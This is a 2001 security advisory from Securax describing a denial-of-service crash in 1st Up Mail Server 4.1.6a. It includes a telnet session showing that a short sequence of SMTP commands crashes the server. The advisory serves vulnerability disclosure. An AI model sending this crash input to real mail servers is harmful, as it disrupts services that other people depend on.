=============================================================================
Securax-SA-20                                               Security Advisory
belgian.networking.security                                             Dutch
=============================================================================
Topic:          1st Up Mail Server multiple command denial of service.
Announced:      2001-05-15
Affects:        1st Up Mail Server version 4.1.6a (and probably below) 
=============================================================================

 Note: This  entire  advisory has been based upon trial and error results. We
       can not ensure the  information below is 100% correct.  This  document
       is subject to change without prior notice.

       If you happen to find more information, solutions, ... about the below
       problem  or further  varients please contact me on the following email
       incubus@securax.org, or you can contact the  Securax crew by e-mail at
       info@securax.org.

 I.  Problem Description
 -----------------------

 1st Up Mail Server  is a mail  server  program for  the MS-Windows operating
 system (9X, NT, 2000 & ME).  The program however  will crash  when one sends
 more than one SMTP command.
 
 II. Impact
 ----------
 
 Heh first this: the site (http://www.upland.co.uk/1stup) says: 
 
  "A powerful yet simple to configure mail server designed specifically for 
   the small  to medium  sized network.  Includes  many features simply not 
   available on other mail servers."
    
 Hmm.. I didn't know that crashing was a feature.

 Anyway, by sending more than one SMTP command to the server it will crash, I
 will give a simple (yet powerful :P) example:
 
 /*  10.0.0.3 (jupiler) is a Win98 box runnning 1st Up Mail Server 4.1.6a */
 
 [incubus:~]$ telnet jupiler 25
 Trying 10.0.0.3...
 Connected to jupiler.local.net.
 Escape character is '^]'.
 220 jupiler.local.net MailServer V4.1 SMTP service ready          
 helo
 250 Imposter
 mail help                <------------ this is the magic thing.
 Connection closed by foreign host.
 [incubus:~]$ 
 
 However the program  crashes and yells for dr. Watson,  no register has been
 overwritten, so I  guess  this  will  be  a denial of service, nothing more, 
 nothing less.

 III. Solutions
 --------------
 
 Vendor has been notified. Check for updates / bugfix at:
    
      http://www.upland.co.uk/1stup
 
 IV credits
 ----------
 First of all, i would like to tell Tessa that I will love her forever and I
 wanna thank her for everything. Tess, I love you. You are an angel.
 
 Words of respect goes out to: |vorlon, cicero, f0bic, root-dude, t-omicr0n,
 tosh, zymot1c, sentinel, ares and nostalg1c.
 
 Also greets to the many, many people i forgot to mention.
 
   incubus (incubus@securax.org).
 
 ============================================================================
 For more information                                     incubus@securax.org
 Website                                               http://www.securax.org
 Advisories/Text                                  http://www.securax.org/pers
 ----------------------------------------------------------------------------